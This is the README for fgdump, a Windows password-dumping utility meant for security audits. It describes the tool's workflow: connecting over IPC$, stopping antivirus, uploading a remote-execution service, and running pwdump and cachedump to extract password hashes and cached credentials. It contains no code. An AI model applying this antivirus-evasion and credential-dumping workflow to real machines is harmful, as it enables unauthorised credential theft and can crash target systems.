** fgdump - A utility for dumping passwords on Windows NT/2000/XP/2003 machines **
Written by fizzgig (fizzgig@foofus.net)

Greets to all my fellow Foofites: j0m0-Kun (who is the inspiration for this program), 
phenfen, omi, fade, pmonkey, grunch and of course our namesake foofus.

Many thanks to the awesome folks who created cachedump and pwdump3e as well! 

More information: http://www.foofus.net

Please let me know if this is useful to you, and I welcome (constructive) comments and
suggestions at fizzgig@foofus.net.

fgdump was born out of frustration with current antivirus (AV) vendors who only partially
handled execution of programs like pwdump. Certain vendors' solutions would
sometimes allow pwdump to run, sometimes not, and sometimes lock up the box. As such,
we as security engineers had to remember to shut off antivirus before running pwdump and
similar utilities like cachedump. Needless to say, we're forgetful sometimes...

So fgdump started as simply a wrapper around things we had to do to make pwdump work 
effectively. Later, cachedump was added to the mix, as were a couple other variations
of AV. Over time it has grown, and continues to grow, to support our assessments and
other projects. We are beginning to use it extensively within Windows domains for
broad password auditing, and in conjunction with other tools (ownr and pwdumpToMatrix.pl)
for discovering implied trust relationships.

fgdump is targetted at the security auditing community, and is designed to be used for 
good, not evil. :) Note that, in order to effectively use fgdump, you're going to need 
high-power credentials (Administrator or Domain Administrator, in most cases), thus
limiting its usefulness as a hacking tool. However, hopefully some of you other security
folks will find this helpful.

In quick summary, the main code execution path of fgdump is as follows:

1) Bind to a remote machine using IPC$ (or a list of machines)
2) Stop AV, if it is installed
3) Locate file shares exposed on that machine
4) Find a writable share from the above list, bind it to a local drive
5) Upload fgexec (used for remote command execution), cachedump
6) Run pwdump
7) Run cachedump
8) Delete uploaded files from the file share
9) Unbind the remote file share
10) Restart AV if it was running
11) Unbind from IPC$

Many of the parameters associated with these operations are tweakable via the command line.
Run fgdump with no parameters to get the current list of available parameters.

fgdump embeds several programs within its resource tree. This means you only need a single 
executable rather than dragging out a bunch of them. Of important note are the following:

- cachedump: This is the popular cached credential program created by the folks at
off-by-one.net (http://www.off-by-one.net/misc/cachedump.html). Currently, the executable 
is included verbatim.
- pwdump3fg: A modified version of pwdump3e. It was tweaked to use other shares besides
just ADMIN$, but otherwise should function in exactly the same way as pwdump3e.

The source for both of these programs is included in the fgdump source tree, as mandated by
the GPL. If you modify fgdump and still use these programs, please continue to distribute
the source code for these fine programs.

Also in the source tree:
- fgexec: A simple service that can be remotely installed that will run a remote executable.
Its very similar in function to psservice or sc, just more limited.

KNOWN ISSUES:

- There appears to be a very bizarre interaction when a target is running M$ "Anti"spyware.
A user will be notified of the installation of the fgexec service, but it appears to run 
anyway despite a user denying the action. In some cases, this operation ends up crashing 
LSASS.EXE, which will auto-reboot the target. The moral of the story: be careful using this
against machines with M$'s Antispyware.

- We've seen isolated incidents of LSASS.EXE crashing even without M$AS, but they are
few and far between. We haven't yet nailed down a cause, but the bet right now is on
LSAEXT.DLL (part of pwdump) causing a problem, which causes its host (LSASS.EXE) to
crash. So again, be careful.

If anyone has additional feedback on these issues, let me know. Also, if you have suggestions
on terminating a program on a remote machine that DOESN'T INVOLVE INSTALLING A NEW SERVICE
(like fgexec or psexec do), let me know. If I can do that, I have a M$AS terminator, but
right now I can't execute it, so I have not yet included it with fgdump. This is a work in 
progress, and the subject of furious research. :)

COMPILING:

The code was all compiled using Visual Studio .NET 2003, and solution/project files for 
it have been included. Ideally, everything should compile out of the box. :)

DISCLAIMER:

I, nor foofus.net, can take any responsibility for misuse of this program, nor can I
guarantee that it will not have adverse affects on certain hosts. By using this program,
you assume any and all risk associated with the execution of the program, including 
but not limited to damage to a system or data loss. In other words,if you break 
someone's stuff, don't come crying to me. :)

--fizzgig
